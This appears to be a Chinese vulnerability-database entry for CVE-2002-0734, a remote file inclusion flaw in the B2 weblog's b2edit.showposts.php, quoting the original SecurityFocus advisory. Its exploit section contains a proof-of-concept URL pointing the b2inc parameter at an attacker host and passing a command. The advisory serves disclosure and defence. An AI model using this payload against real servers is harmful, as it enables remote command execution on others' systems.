B2 B2config.php远程命令执行漏洞

B2 B2config.php远程命令执行漏洞

漏洞ID 1106714 漏洞类型 未知
发布时间 2002-05-06 更新时间 2005-05-02
图片[1]-B2 B2config.php远程命令执行漏洞-安全小百科CVE编号 CVE-2002-0734
图片[2]-B2 B2config.php远程命令执行漏洞-安全小百科CNNVD-ID CNNVD-200208-125
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21436
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-125
|漏洞详情
B2是一款新闻/WEB记录工具,由PHP编写,允许管理员快速在Frontpage中张贴新闻,并允许浏览者交互,可使用于Linux和Unix操作系统下。B2中B2config.php脚本在处理引用变量上存在问题,可导致远程攻击者以B2进程的权限在目标系统上执行任意命令。在PHP脚本引用的变量实际不存在,因此,攻击者可以自己定义变量值,通过在自己控制的服务器上建立PHP脚本并嵌入相关命令,攻击者可以引用这个远程文件,导致攻击者以B2权限在目标服务器上执行任意命令。问题存在于/b2-include/b2edit.showposts.php中:*snippet*通过远程引用,就可以在目标系统上以B2进程的权限执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/4673/info

B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux.

A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. 

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls
|参考资料

来源:BID
名称:4673
链接:http://www.securityfocus.com/bid/4673
来源:XF
名称:b2-b2inc-command-execution(9013)
链接:http://www.iss.net/security_center/static/9013.php
来源:BUGTRAQ
名称:20020506b2phpremotecommandexecution
链接:http://archives.neohapsis.com/archives/bugtraq/2002-05/0027.html
来源:cafelog.com
链接:http://cafelog.com/

相关推荐: Mailtraq 2.1.0.1302 – User Password Encoding

Mailtraq 2.1.0.1302 – User Password Encoding 漏洞ID 1053965 漏洞类型 发布时间 2003-06-16 更新时间 2003-06-16 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Windows…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享